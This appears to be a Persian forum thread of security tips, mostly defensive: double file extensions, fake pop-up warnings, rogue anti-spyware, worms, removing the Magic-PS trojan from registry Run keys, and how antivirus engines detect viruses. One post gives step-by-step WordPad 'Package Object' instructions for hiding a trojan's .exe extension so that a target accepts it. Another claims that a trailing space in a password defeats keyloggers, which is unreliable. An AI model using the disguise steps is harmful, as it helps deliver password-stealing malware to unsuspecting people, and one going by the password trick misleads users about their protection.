در حقیقت مثلاً اگر عکسی می خواهید دریافت کنید آیا فایل مربوطه پسوند JPG و یا یکی از پسوندهای فایلهای گرافیکی را دارد؟
نه اینکه فایلی با پسوند اجرایی exe و یا bat برای شما ارسال شود و فرستنده هم مدعی باشد که این یک فایل تصویری است.
در واقع فایلهای هک که با نرم افزارهای تروجان ساز ساخته می شوند، در قسمت پسوند دارای پسوندهایی مثل scr یا exe و... هستند. همانند فایلی به نام و پسوند mypic. jpg.scr . این موضوع نشان دهنده آن است که فایل فرستاده شده یکی از انواع فایل های ساخته شده توسط نرم افزارهای مخرب است که برای بدست اوردن پسورد شما می باشد.
بنابراین همواره نوع پسوند فایلهای دریافتی را زیر نظر داشته باشید و بدانید که از این طریق و قبل از هر چیز (حتی قبل از استفاده از نرم افزارهای ضد هک و ضد ویروس) می توانید تا حد زیادی از کیفیت نوع و چگونگی عملکرد و ماهیت یک فایل اطلاع حاصل کنید.
Behzad AZ
06-30-2010, 08:16 AM
در این ترفند قصد داریم بر خلاف همیشه به معرفی 20 راه بپردازیم که با عمل کردن به آنها میتوانید نابودی سیستم و ویندوز خود را تضمین کنید! هدف ما از معرفی این روشها عدم عمل به آنها از جانب شما بوده است! تا میتوانید از این راهها دوری کنید، وگرنه...!
1- سعی کنید در بین دوستان رکورد بزنید و از یک ویندوز خود تا چندین و چند سال استفاده کنید!
2- در مرورگر اینترنت اکسپلورر نسخه 6 بر روی هر لینکی که میبینید راست کلیک کنید و Open in New Window را انتخاب کنید!
3- هنگام بالا آمدن ویندوز سعی کنید تمامی بازیهای نصب شده روی سیستم خود را اجرا کنید!
4- آنتی ویروس خود را به هیچ وجه به روز نکنید!
5- پس از قرار دادن سیدی و باز کردن محتویات آن دکمه Eject سیدی را بزنید!
6- با دیدن هر پنجره تبلیغاتی روی آن کلیک کنید و از سایتهای ناآشنا دیدن کنید!
7- برنامه های ناآشنای ضدجاسوسی را روی سیستم خود نصب کنید!
8- در هنگام چت کردن فایلهای افراد با فرمت exe را دریافت کنید و باز کنید!
9- برنامه های اضافی و به درد نخور نصب شده روی سیستم خود را پاک نکنید!
10- از ابزارهای موجود در Start>All Programs>Accessories>System Tools به عنوان دکور استفاده کنید!
11- به اشخاص ناشناس اطمینان کنید و اطلاعات محرمانه خودتان را لو بدهید!
12- تا میتوانید سی دی خشدار در CD-ROM خود فرو کنید!
13- در هر سایت ناآشنایی را که میبنید ایمیل خود در را ثبت کنید!
14- سعی کنید برنامه آپدیت ویندوز را به طریقی از کار بیندازید!
15- به رجیستری ویندوز رفته و فایلهای موجود در آن دستکاری کنید!
16- تمام سعی خود را بکنید که به اینترنت اکسپلورر وفادار بمانید!
17- فایلهای حیاتی ویندوز را دستکاری کنید!
19- کوکی ها و اطلاعات History خود را پاک نکنید!
20- و در نهایت اینکه توصیه های امنیتی را پشت گوش بیندازید!
Behzad AZ
06-30-2010, 08:16 AM
کامپیوتر شما، چه سه ساله باشد، چه سه روزه، با مشکلات امنیتی یکسانی مواجه است که گاهی بسیار خطرناک هستند. ویروس*ها می*خواهند به محض آمدنتان به روی خط، وارد سیستمتان شوند. جاسوس*افزارها بر پشت نامه*ها سوار*می*شوند و سعی می*کنند همراه با تبلیغات وارد سیستم شما شوند. تروجان*ها در کمین می*نشینند و با اولین غفلت، نفوذ* می*کنند. راه*های مختلفی برای مقابله با این خطرات وجود دارد. در این ترفند سعی خواهیم کرد ضمن معرفی خطرات امنیتی، روش*های مقابله با هر یک را توضیح دهیم. لازم به ذکر است که این نکات هیچ ترتیب خاصی ندارد و اولویت در مطرح کردن هر یک از آن*ها، دلیل مهم بودن آن برسایر موضوعات نیست.
هشدارهای امنیتی را این بار جدی نگیرید!
پنجره*های Pop-up به خودی خود مزاحم هستند؛ چه برسد به این که هشدار بدهند سیستم شما دارای یک مشکل امنیتی است. فروشندگان محصولاتی که ظاهراً نرم*افزارهای **امنیتی هستند، با ترساندن کاربران ساده و بی*دقت، آن*ها را ترغیب به دانلود نرم*افزارهای مزبور *می*کنند، یا آن*ها را طوری از خطری که وجود ندارد می*ترسانند که مجبور*شوند حداقل سری به سایتشان بزنند. بعید است تا*کنون با چنین پنجره*های هشدارآمیزی هنگام گشت*زدن در وب مواجه نشده **باشید.
بعضی وقت*ها شکل پنجره*ها طوری است که گویا از طرف ویندوز هشدار می*دهد. اما چنین نیست و این*ها فقط تبلیغ هستند. گاهی یک علامت کمرنگ در پایین این پنجره آمده است. ولی طراحی صفحه طوری است که کاربر به آنجا توجه نمی*کند و فکر می*کند هر چه زودتر باید کاری بکند. به همین*خاطر، بی*محابا روی دکمه Yes کلیک می*کند تا شاید نجات یابد. اما روی هر چه کلیک کند (چه Yes، چه No، چه هر جای دیگر)، به سایت فروشنده هدایت می*شود تا نرم*افزار مخرب را دانلود کند.
در اینجا قصد نداریم اسمی از چنین فروشنده*هایی بیاوریم (ترفندستان) یا محصول خاصی را نام ببریم. مهم این است که هر کس می*تواند یک صفحه وب Pop-up را طوری طراحی کند که شبیه به کادرهای ویندوز باشد و کاربر فکر *کند واقعاً با یک مشکل امنیتی مواجه شده که ویندوز دارد هشدار می*دهد. حتی بعضی از آن*ها با جعل المان*های ویندوز (مثل منوی Programs) برای کاربرِ از همه جا بی*خبر، هیچ تردیدی را باقی نمی*گذارند که کل قضیه را باور کند. حال *آن* که ماجرا به* کلی دروغ است.
حال سؤال این است که چگونه می*توان چنین پنجره*هایی را از هشدارهای واقعی ویندوز تشخیص داد. اولاً حتی اگر وحشتناک*ترین هشدار را هم دیدید، نباید هول شوید و عجولانه کاری بکنید. ثانیاً اگر به خط عنوان و پایین صفحه نگاه کنید، حتماً می*توانید تشخیص *دهید که یک پنجره Internet **Explorer است یا پنجره*ای جعلی. البته این صرفاً سرنخ است و برهان قاطع نیست.
واقعاً ممکن است ویندوز یا یکی از نرم*افزارهای نصب شده در سیستم *شما (از جمله برنامه ضدویروس*) چنین پنجره*ای را ظاهر کرده باشد. اما احتمال این حالت خیلی ضعیف است و شما در اکثر موارد می*توانید فرض بگیرید که با یک پنجره تبلیغاتی مواجه هستید. ولی اگر مردد هستید، روی پنجره، راست کلیک کنید و گزینه Properties را بزنید.
با این کار معلوم می*شود که صفحه از طرف کدام سایت نشان داده شده است. دیالوگ کادرهای واقعی IE گونه، آدرس غیراستانداردی دارند که با چیزی مثل: *res آغاز می*شود. اما پنجره*های تبلیغاتی یک آدرس واقعی وب دارند. مهم این است که عجولانه نسبت به پیام عکس*العمل نشان ندهید، بلکه مکث کنید و با دقت پیام را بخوانید. خیلی اوقات از محتوای پیام هم می*توان به دروغ بودن آن پی برد.
مراقب آرشیو مکاتبات آنلاین باشید
فهرست*های پستی (Mailing List) مرجع خوبی برای به دست آوردن هر نوع اطلاعات هستند؛ به ویژه آرشیو این فهرست*ها که به اینترنت پست شده*اند. پیام*هایی که در این فهرست*ها بین اعضا رد و بدل می*شود، غالباً به صورت آرشیوهای قابل جستجو در دسترس هستند و جستجوگرانی چون گوگل و غیره آن*ها را پیدا می*کنند. با این که این مجموعه مکاتبات نعمت بزرگی برای محققان هستند، اما می*توانند پناهگاه ویروس*ها و سایر خطرات اینترنتی هم باشند.
اگر سرور آرشیو کننده نظارتی بر ویروس*ها نداشته**باشد و ضمائم نامه*ها را آزاد بگذارد، ممکن است پیام*هایی را آرشیو کرده باشد که حاوی فایل*های آلوده*کننده هستند. خودتان می*توانید امتحان کنید. مثلاً در گوگل به جستجوی فایل postcard.pif بپردازید، یعنی فایل آلوده*ای که در بسیاری از کرم*های سری W32/Netsky به کار رفته*است. نتیجه جستجو قطعاً پر از لینک*هایی به پیام*هایی در آرشیو فهرست*های پستی خواهد بود که نسخه فعالی از این ویروس را به عنوان ضمیمه دارند. کلیک روی یکی از این ضمائم در آرشیوهای مزبور، سیستم را بلافاصله آلوده می*کند.
نرم*افزار ضدجاسوسی و ضدتبلیغاتی را به*درستی انتخاب کنید
امروزه جاسوسی اینترنتی، برای کاربران کامپیوتر به واقعیتی گریزناپذیر تبدیل شده است. حاصل کمی غفلت هنگام گشت *زدن در وب، ممکن است مرورگر شده، کوکی*های متجاوز و پاپ*آپ*های تمام*نشدنی باشد. بسیاری از کاربران برای این *که از شر این پلیدی*های اینترنت در امان بمانند، به نرم*افزارهای ضدجاسوسی
(Anti Spyware) پناه می*برند.
اما اگر انتخاب برنامه*های ضدجاسوسی و ضدتبلیغاتی از روی دقت صورت نگیرد، درمان ممکن است بدتر از خود مرض از آب در بیاید. اگر به دنبال راهی برای مقابله با پاپ*آپ*ها هستید، گوگل، یاهو و MSN ابزارهای خوبی برای مسدود* کردن این پنجره*ها را به*طور رایگان عرضه **می*کنند.
خود اینترنت اکسپلورر، اگر سرویس*پک 2 ویندوز اکس*پی را نصب کرده باشید، یک Pop-up Blocker قوی دارد. بسیاری از برنامه*های ضدویروس خوب هم امروزه به پاپ*آپ بلاکر مجهزند. بنابراین نیازی به تهیه جداگانه این برنامه نیست.
مشهورترین برنامه*های ضد*جاسوسی در حال حاضر، سه محصول Ad-Aware ،Spybot Search and Destroy و SpySweeper هستند. که تمام آن*ها نسخه رایگان هم دارند. نسخه رایگان این برنامه*ها، هم اسکن** می*کند و هم بیشتر جاسوس*افزارها، تبلیغ*افزارها و به*طورکلی کدهای پلید را از بین**می*برد.
اما یک سری از برنامه*های ضد*جاسوسی هم وجود **دارند که به برنامه*های یا موسومند.
این برنامه*ها از طریق یک پاپ*آپ تبلیغ می*شوند که مدعی است هر بدافزاری را از روی سیستم شما پاک می*کند با این*حال این برنامه*ها به قدری سمج هستند و آن قدر کاربر را تحت فشار**می*گذارند تا مجبور* شود پیشنهاد دانلود را بپذیرد.
یکی از نشانه*های برنامه*های ولگرد این است که دانلود و اسکن به طور رایگان انجام می*شود. اما موقع پاک کردن که می*رسد، می*گویند باید برنامه را بخرید. حتی بعضی از آن*ها به دروغ اعلام می*کنند که سیستم گرفتار جاسوس*افزار است و کاربر را مجاب می*کنند که برنامه را بخرد. بدترین نمونه از این نرم*افزارها، که برخی سایت*ها آن*ها را نامیده*اند، خودشان در سیستم مشکل ایجاد می*کنند و حتی Uninstall هم نمی*شوند و کاربر را مجبور می*کنند برای گرفتن Uninstaller، خود نرم*افزار را بخرند.
حال سؤال این است که چه باید کرد؟ چگونه می*توان یک محصول قانونی و مشروع را از یک برنامه فریبکار و نامشروع تشخیص داد؟ یک قاعده کلی این است که اگر فروشنده*ای تبلیغ کند که نرم*افزارش سیستم شما را از شر جاسوس*افزارها و تبلیغات خلاص می*کند، به احتمال زیاد خودش جاسوس*افزار است. تبلیغات پاپ*آپ و banner غالباً ادعا** می*کنند که سیستم به جاسوس*افزار آلوده شده*است.
گرچه بعضی از محصولات تجاری ضدجاسوسی پیشنهاد اسکن رایگان سیستم را ارائه می*دهند، ولی پیشا*پیش ادعا نمی*کنند که کامپیوترتان آلوده است.
طبق یک نظرسنجی که شرکت*های WebRoot و AOL انجام داده*اند، بیش از 90* درصد کاربران کامپیوتر، در سیستم خود شکلی از جاسوس*افزار را دارند. بنابراین، اسکن مستمر سیستم، یک ضرورت است. ابتدا از یکی از این اسکنرها و پاک *کننده*های رایگان استفاده** کنید. سایت SpywareWarrior.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL1NweXdhcmVXYXJyaW9yLmNvbQ%3D%3 D) فهرستی از نود برنامه آزمایش شده را ارائه داده است که . با این که تمام برنامه*هایی که در این سایت معرفی شده*اند ممکن است بد نباشند، ولی منطق حکم می*کند به طرف آن*ها نروید.
بعضی از سایت*هایی که برنامه*های ضد*جاسوسی ولگرد را تبلیغ *می*کنند و سایت*هایی که خودشان به انتشار جاسوس*افزار و کدهای مخرب می*پردازند، با استفاده از نقاط ضعف ویندوز و اینترنت اکسپلورر، نصب*های انجام می*دهند و به نمایش پاپ*آپ*های تمام*نشدنی می*پردازند. به روز نگه*داشتن ویندوز یکی از آسان*ترین راه*ها برای مقاوم* شدن در برابر این تهدیدات است. از آنجا که بعضی برنامه*های ضد *ویروس، قابلیت*های ضدجاسوسی هم دارند، بروز نگه*داشتن آن*ها هم کار خوبی است.
Spybot S&D ،SpySweeper و برخی دیگر از محصولات خوشنام نیز سیستم شما را در مقابل بعضی از این سایت*ها مقاوم می*کنند. قابلیت معرفی سایت*های ناامن در منطقه امنیتی اینترنت اکسپلورر (Security Zone) یکی از ویژگی*های خوب این مرورگر است که به آسانی در دسترس است. سایت SpywareGuide.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL1NweXdhcmVHdWlkZS5jb20%3D) فهرستی از سایت*های مخرب را به*طور رایگان ارائه می*دهد که می*توانید به Security*Zone اینترنت اکسپلورر معرفی کنید.
بلوکه کردن پاپ*آپ*ها، راه دیگری برای مواجهه با این مشکل است. اگر از سیستم*عاملی غیر از ویندوز اکس*پی استفاده می*کنید، یا هنوز سرویس*پک2 ویندوز اکس*پی را نصب نکرده*اید، می*توانید از برنامه*های شرکت*های دیگر، مثل MSN، یاهو و یا گوگل برای مسدود*کردن پاپ*آپ*ها استفاده کنید.
در مجموع، دور نگه*داشتن سیستم از شر جاسوس*افزارها، تبلیغ*افزارها و به* طور کلی برنامه*های مخرب، احتیاج به دقت و هشیاری دارد. بیشتر کاربرانی که از پاپ*آپ*ها و جاسوس*افزارها شکایت دارند، به خاطر این است که آگاه نیستند این چیزها چگونه به کامپیوترشان راه پیدا می*کنند. به پیام*هایی که پیشنهاد نصب یک نرم*افزار را به شما می*دهند، خوب دقت کنید و چشم بسته قبول نکنید. اگر برنامه*ای را از قبل نمی*شناسید، بدون خواندن اقدام به نصب آن نکنید. اگر چیز مشکوکی را دیدید، روی هیچ دکمه*ای کلیک نکنید (نه Yes و نه No)، و بلافاصله پنجره را ببندید (کلید Alt+F4 را بزنید).
سرقت مرورگر
سرقت صفحه یا هایجک*کردن مرورگر (Browser Hijack یا مرورگرربایی) یکی از رایج*ترین آزارهای اینترنتی (بیشتر از ویروس و کرم) است که کاربران خانگی و حتی شرکتی را گرفتار کرده است. هدف از این کار، اولاًً هدایت کردن وب*گردها به یک سایت جستجوگر خاص و ثانیاً نظارت بر فعالیت آن*ها به منظور هدفمند *کردن تبلیغات (در قالب پنجره*های پاپ*آپ) می*باشد. هایجک کردن مرورگر چیزی بین Malware و Adware است.
انگیزه این کار بر خلاف ویروس*ها، پول درآوردن است؛ پولی که از فروش فضای تبلیغاتی در وب و فروش خدمات و کالاهای تبلیغ*کنندگان به دست می*آید. البته برخی از سارقان مرورگرها، با Backdoor و تروجان*هایی همراهند که به فروشندگان امکان دانلود برنامه*های مخرب و جمع*آوری کلیدضربه*ها و سایر اطلاعات خصوصی را می*دهند.
متأسفانه هیچ راه یکسانی برای از بین*بردن تمام این نرم*افزارها وجود*ندارد. تکنیک*های هایجک*کردن مرورگر، امروزه بسیار پیچیده شده*اند. از صفحات ساده*ای که با استفاده از کدهای جاوا اسکریپت صفحه پیش*فرض را تغییر می*دهند گرفته تا موجوداتی مثل Smartsearch.WS که با تغییر رجیستری کاری می*کنند که اگر کاربر فراموش کرد پیشوند HTTP را تایپ کند، خود به خود هر صفحه را به سایت خودش تغییر جهت دهد.
بهترین راه برای مقابله با هایجک*کننده*های مرورگر، پیشگیری از آن*هاست. بیشتر هایجک*ها با تعامل خود کاربر صورت می*گیرند. وقتی کاربر به دیدن صفحات خاصی از وب می*رود، با پاپ*آپی مواجه می*شود که پیشنهاد دانلود یک نرم*افزار، یک چیز رایگان، یا در ساده*ترین شکل، تغییر صفحه شروع مرورگرش را می*دهد. در این مواقع فقط یک کار صحیح است؛ رد پیشنهاد.
اخیراً برخی از هایجکرها به روش*های ویروس*گونه روی آورده*اند و از نقاط ضعف اینترنت اکسپلورر سوءاستفاده* می*کنند. نقطه ضعف MHTRedir یک سری تروجان را پوشش می*دهد که غالباً برای دانلود تماس*گیرنده*های مستهجن و اخیراً کرم Bagle.AQ به*کار گرفته می*شوند. البته مایکروسافت این نقطه ضعف را با روزآمدسازی امنیتی MS04-025 خود ترمیم کرده است. بنابراین اگر سیستم*شما بروز باشد، کمتر مورد آسیب قرار* می*گیرد. محصولات ضدویروس هم، بسیاری از این نوع تروجان*ها را شناسایی می*کنند. بنابراین به کمک این برنامه*ها هم می*توانید جلوی هایجک*شدن را از همان ابتدا بگیرید.
اما اگر بعد از همه این مراقبت*ها باز هم گرفتار هایجک شدید، برنامه*هایی مثل Hijack This،Ad-aware ،Spybot S&D و SpySweeper احتمالاً مشکل شما را حل *می*کنند. همچنین سایت*هایی چون Scumware.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL1NjdW13YXJlLmNvbQ%3D%3D) ،MVP.org (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL01WUC5vcmc%3D) ،Spywareinfo.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL1NweXdhcmVpbmZvLmNvbQ%3D%3D) و MajorGeeks.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL01ham9yR2Vla3MuY29t) می*توانند مفید باشند
Behzad AZ
06-30-2010, 08:17 AM
ممکن است شما نیز تا به حال در جستجوی کرک برنامه ها و بازی ها بوده اید، اما متاسفانه سایتهای بسیاری وجود دارد که از این حربه برای فریب کاربران استفاده میکنند و برنامه های آلوده به ویروس خود را به جای کرک های برنامه ها برای دانلود قرار میدهند. در این ترفند قصد داریم روشهای مفیدی را معرفی کنیم که میتوانید این کرکهای آلوده را که حتی بسیاری از آنتی ویروس ها در تشخیص آنها ناکام هستند، خودتان تشخیص دهید و از دیگر از این طریق ویروسی نشوید.
برای استفاده از کرک این سایتها باید به موارد زیر توجه کرد:
1-حتما قبل از باز کردن فایل آن را با آنتی ویروس خود چک کنید. توجه داشته باشید که آنتی ویروستان داخل فایلهای فشرده نظیر zip ،rar و... را بایستی چک کند.
2-دستورالعمل داخل فایل با پسوند nfo را بخوانید. دقت کنید برای خواندن آن میتوانید از نرم افزار Notepad استفاده کنید.
3-فایلهایی با نامهای crack.exe ،run.exe ،NiTROUS.exe و... غالبأ ویروسی هستند. سعی کنید آنها را تا مطمئن نشدید اجرا نکنید. توصیه می کنیم آنها را بلافاصله پاک کنید!
Behzad AZ
06-30-2010, 08:17 AM
ویندوز XP نیز برای راحتی حال کاربران خود یک سیستم مقابله با ویروس ها و هکرها را در درون خود گنجانده است. این ترفند که بیشتر به کار افراد نیمه مبتدی می آید میتواند با استفاده از این قابلیت از ویندوز شما حفاظت کند.
برای فعال سازی آن:
1- از منوی Start، به Control Panel بروید.
2- بر روی Network and Internet Connections کلیک کنید.
3- سپس Network Connections را انتخاب کنید.
4- حال بر روی اتصال اینترنت خود، کلیک راست کرده و از منوی باز شده Properties را انتخاب کنید.
5- از Tab, Advanced گزینه ی Internet Connection Firewall را فعال کنید.
6- بر روی OK کلیک کنید.
Behzad AZ
06-30-2010, 08:17 AM
کرمها اصولاً ویروس نیستند. با این وجود تفاوت بین آنها بسیار اندک است و معمولاً در اخبار روزمره آنها را با یکدیگر اشتباه می گیرند. ویروسها یک کامپیوتر منفرد را آلوده می کنند و سعی نمی کنند به کامپیوتر دیگری راه پیدا کنند اما کرمها بسیار شرورترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند (مثلاً با اشتراک گذاشتن فایلها بوسیله Email یا بوسیله فلاپی دیسک ها). کرمها به شدت علاقه مندند که فقط خود را در میان یک شبکه گسترش دهند. آنها به طور خودکار خودشان را به کامپیوترهای دیگر انتقال می دهند به علت اینکه انتقال آنها بین کامپیوترها به طور خودکار انجام می پذیرد سرعت گسترش آنها بسیار سریعتر از ویروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.
معمولترین راه گسترش یک کرم این است که خود را به همه آدرسهای ایمیلی که شما در Address Book خود لیست کرده اید برساند، یا Outlook شرکت مایکروسافت برنامه Email ای است که بیشترین آسیب پذیری را در برابر حمله کرمها دارد، فقط به این دلیل که عمومی ترین برنامه است. برای کاهش دادن احتمال آلوده شدن به کرمها شما می توانید مراحل زیر را اجرا کنید:
1- هیچ فایل الصاقی (Attachment) غیر منتظره ای را در Email های خود باز نکنید (بخصوص آنهایی را که شامل پیغامهای معمول مانند در این جا فایلی که شما درخواست کرده اید وجود دارد.) هر چند آنها از منابع مطمئنی برای شما ارسال شده باشند. برای فرستنده Email ای بفرستید (Reply) و از او سئوال کنید او واقعاً چنین فایلی برای شما فرستاده است یا نه؟
2- یک آنتی ویروس نصب کنید و آن را مرتباً آپدیت کنید.
3- اگر ممکن است از نرم افزار Email ای به غیر از Outlook Express استفاده کنید.
اولین نمونه های کرمی که به خوبی منتشر شده "Love Letter" نام دارد که با فرستادن خود به آدرس ایمیل که در Address Book نرم افزار Outlook Express وجود دارند منتشر می شود به راحتی کپی کردن فایل در کامپیوتر قربانی خود را وارد می کند و با یک عنوان به صورت "I Love You" وارد می شود و پیغام آن به صورت زیر است:
"Rindly Chek The Attached Love Letter Coming From Me"
بدلیل اینکه Email از یک فرد شناخته شده برای گیرنده ارسال شده است بسیاری از مردم گول می خورند و کرم در حجم وسیع گسترش پیدا می کند. اگر چه به کامپیوتر قربانی آسیب وارد می شود ولی آسیب اصلی به کل شبکه وارد می شود و همه آن را آلوده می کند.
اسب تراوا چیز جالبی به نظر می رسد اما چیزهای آسیب رسان و کثیفی در بر دارد. و در لباس خدمات مفید یا پیوستهای (Attachments) جذاب در Email مثلاً یک Screen Saver پخش می شود. آنها فایلهی الصاقی برای شما می فرستند که آنقدر برای شما جالب است که آنها را برای دوستانتان می فرستید. در حالیکه آثار مخرب آن پنهان بوده با تأخیر عمل می کند بنابراین شما نمی دانید چیزی که در حال فرستادن آن هستید یک فایل خطرناک است.
در مواقع دیگر این کرمها تکثیر می شوند مانند یک کرم اینترنتی و خود را به صورت اتوماتیک به کامپیوترهای دیگر می رسانند و معمولاً از Outlook Express استفاده می کنند.
Behzad AZ
06-30-2010, 08:18 AM
مطمئنأ اکثر کسانی که با مقوله هک و امنیت آشنا هستند نام تروجان معروف Magic-PS را شنیده اند. این تروجان موجب دزدیده شدن پسورد کاربران پس از اجرا میشود و میتواند به سادگی پسورد یاهو شما را برای تروجان ساز ارسال کند. در این ترفند قصد داریم روشی را به شما معرفی کنیم که با بهره گیری از آن میتوانید کار این تروجان را کاملا ساقط کنید و خیال خود را از هک شدن بدین وسیله راحت کنید.
بدین منظور:
از منوی Start وارد Run شده و در آن عبارت regedit را وارد کرده و Enter بزنید تا ویرایشگر رجیستری ویندوز باز شود.
سپس به آدرس زیر بروید:
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunOnce
سپس از قسمت دیگر پنجره، دنبال متغیری با نام SVCHOST یا svchost بگردید و در صورت وجود با راست کلیک بر روی آن و انتخاب Delete آن را حذف کنید.
همین عمل را در آدرس زیر نیز اعمال کنید:
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
در پایان سیستم را مجددأ راه اندازی کنید.
این ترفند بر روی نسخه 1.5 یا پایین تر نرم افزار Magic-PS عمل میکند.
Behzad AZ
06-30-2010, 08:18 AM
قصد داریم یک ترفند جالب و در عین حال ساده را به شما معرفی کنیم که با بهره گیری از آن میتوانید پسورد یاهو مسنجر و همین طور سایر رمزهای عبور خود را از دست هکرها در امان بدارید. با این ترفند کار بسیاری از تروجان ها و برنامه های جاسوسی صفحه کلید را دچار اختلال خواهید کرد.
در الگوریتم بسیاری از نرم افزارهای جاسوسی صفحه کلید (*KeyLoger) و تروجان ها، کلید Space در انتهای پسورد در نظر گرفته نشده است.
از همین طریق میتوان این ترفند را صورت داد:
کافی است در پسوردی که برای خود ایجاد میکنید در پایان آن یک Space بزنید و یک فاصله ایجاد کنید. به همین راحت کار بسیاری از نرم افزارهای دشمن را دچار اختلال کرده اید.
دقت کنید از این به بعد باید هنگام وارد کردن پسورد، Space را هم در پایان پسورد بزنید.
به عنوان مثال برای رمز عبور tarfandestan کافی است آن را به صورت [tarfandestan[space ثبت کنیم.
هنگامی که پسورد شما هک میشود دیگر Space برای هکر نشان داده نمیشود و او پسورد را به همان شکل tarfandestan میبیند و در نتیجه در ربودن پسورد شما ناکام میماند.
البته دقت کنید این موضوع همواره 100% نیست و این روش نسبی جهت بالا بردن امنیت است.
Behzad AZ
06-30-2010, 08:18 AM
تمامی کسانی که در هک اندکی نیز سر رشته دارند مطمئنأ میدانند وقتی یک تروجان ساخته میشود، پسوند آن exe. و یا موارد مشابه آن است. این موضوع میتواند باعث شود که فرد مورد نظر تروجان را دریافت نکند. اکنون قصد داریم یک ترفند بسیار جالب را به شما معرفی کنیم که با استفاده از آن میتوانید این پسوند را کاملا محو سازید، به نوعی که همچنان همان کارایی را داشته باشد.
بدین منظور:
از منوی Start و سپس All Programs وارد Accessories شده و Wordpad را انتخاب کنید.
پس از باز شدن برنامه Wordpad تروجان مورد نظر را Copy کرده و در درون Paste ،Wordpad نمایید.
حال (ترفندستان) از منوی بالای برنامه وارد Edit>Package Object>Edit Package شوید.
در پنجره باز شده از منوی Edit بر روی Copy Package کلیک کنید.
در پایان وارد یکی از درایو های کامپیوتر شده و راست کلیک کنید و Paste را انتخاب کنید.
فایلی که Paste میشود تروجان جدید شما بدون پسوند exe است که در صورت اجرا، همان کارایی را دارد.
Behzad AZ
06-30-2010, 08:19 AM
در این ترفند قصد داریم بحث آنتی ویروسها را به طور کامل برای شما باز کنیم. اینکه چه آنتی ویروسی مطمئن تر است؟ آنتی ویروسها چگونه یک ویروس را میشناسند؟ تکنیک های ویروس یابی و بسیاری مطالب دیگر. با بهره گیری از این ترفند میتوانید خودتان آنتی ویروس بهتر و مطمئن تر را انتخاب کنید.
اشاره:
در دنیای شبکه*ای امروز، لزوم داشتن یک نرم*افزار ضدویروس قدرتمند که کامپیوتر ما را از انواع ویروس*ها، کرم*ها، بمب*های منطقی و به*طور کلی کدهای مخرب مصون بدارد، بیش از هر زمان دیگری احساس می*شود. خوشبختانه (شاید هم متأسفانه) انتخاب*های متعددی در این زمینه وجود دارد. ولی واقعاً کدام یک از آن*ها می*تواند بهتر مشکل کامپیوتر (یا کامپیوترهای شبکه) ما را حل کند؟ کافی است سری به سایت*های مربوط به فروشندگان این نوع نرم*افزارها بزنید. به نظر می*رسد که همه آن*ها از بهترین*ها هستند. و همه آن*ها در تمام طول سال و در تمام 24 ساعت شبانه*روز خدمات خود را ارایه می*دهند. از طرفی به دلیل بازار رقابتی موجود، هیچکدام از آن*ها اطلاعات دقیقی از نرم*افزارخود ارایه نمی*دهند. شما چه یک متخصصIT باشید و چه یک کاربر معمولی، ممکن است به دلیل نداشتن اطلاعات صحیح برای انتخاب ضدویروس مناسب خود با مشکل مواجه می*شوید. بنابراین بسیار مهم است که بدانید ضدویروس*ها چگونه کار می*کنند و در واقع عوامل مهم برای انتخاب آن*ها کدامند.
ضدویروس*ها چگونه کار می*کنند؟
اولین قدم جهت انتخاب یک ضدویروس مناسب آشنایی با کارکرد ضدویروس*ها می*باشد.
پس از آشنایی با خصوصیات یک ضدویروس، واژگانی که در این زمینه استفاده می*شود، را خواهید شناخت. این*که بدانید ضدویروس چه کارهایی می*تواند انجام بدهد و چه کارهایی نمی*تواند انجام دهد، به شما کمک می*کند که انتظارات معقولی از آن داشته باشید.
یک ضدویروس چگونه ویروس*ها را شناسایی می*کند؟
روش*های مختلفی برای شناسایی ویروس*ها وجود دارد.
ویروس*ها (به*طور معمول) چیزی بیشتر از کد یک برنامه نیستند. بنابراین اگر ما بدانیم که هر کدی چه کاری انجام می*دهد قادر خواهیم بود که کد حامل ویروس را به محض رویت شناسایی کنیم.
این کار اولین عملی است که انجام می*گیرد و به نام Signature Matching معروف است.
نرم*افزارهای ضدویروس که به این روش کار می*کنند دارای یک بانک اطلاعاتی هستند که شامل Virus signatureها است و به محض این*که کدی را ملاحظه کرد که معادل یکی از رکوردها باشد آن را به عنوان ویروس شناسایی می*کند. به نظر می*رسد که موثرترین راه برای کشف ویروس*ها همین باشد. روش فوق ذاتاً به*گونه*ای است که اول ویروس را شناسایی می*کند و بعد متناظر با آن یک رکورد (virus signature) به بانک اطلاعاتی اضافه می*کند و حالا اگر ویروسی پیدا کند، در صورتی*که متناظر با این ویروس رکوردی در بانک اطلاعاتی باشد قادر به شناسایی آن خواهد بود و همین امر ایجاب می*کند شرکت*هایی که از این فناوری در نرم*افزار خود استفاده می*کنند مدام آن را بروز نگه دارند. به هر حال این یک نقطه ضعف می*باشد و برای فائق آمدن بر آن دو روش دیگر در نرم*افزارهای ضدویروس معرفی شده است.
1- Heuristic method (روش* مکاشفه*ای)
فلسفه Heuristic این است که بتوانیم ویروس*هایی را شناسایی کنیم که هنوز Virus Signature آن*ها در بانک اطلاعاتی موجود نمی*باشد.
این کار با استفاده از یک بانک اطلاعاتی که رکوردهای آن حاوی Virus behavior signature می*باشد قابل انجام است. رکوردهای این بانک اطلاعاتی (ترفندستان) امضای ویروس خاصی را نگهداری نمی*کنند بلکه بیشتر رفتارهای (رفتار بد) ویروس*ها را ذخیره می*کنند. مثلاً این*که هر کجا تشخیص بدهند کدی قصد پاک کردن Boot Sector را دارد از آن جلوگیری می*کنند.
الگوریتم*هایHeuristic به دو صورت پیاده*سازی می*شوند:
● اگر تکنولوژی Heuristic کد هر برنامه را با Virus behavior Signature مقایسه کند و مورد آنالیز قرار دهد آن را روش static heuristic می*نامیم.
● در بعضی مواقع این تکنولوژی قطعه کد را در یک ماشین مجازی اجرا می*کند تا نتایج رفتاری آن را ببیند به این روش dynamic heuristic می*گوییم. این روش ممکن است نتایج غلطی نیز تولید کند.
Integrity checksum -2 (جامعیت سرجمع)
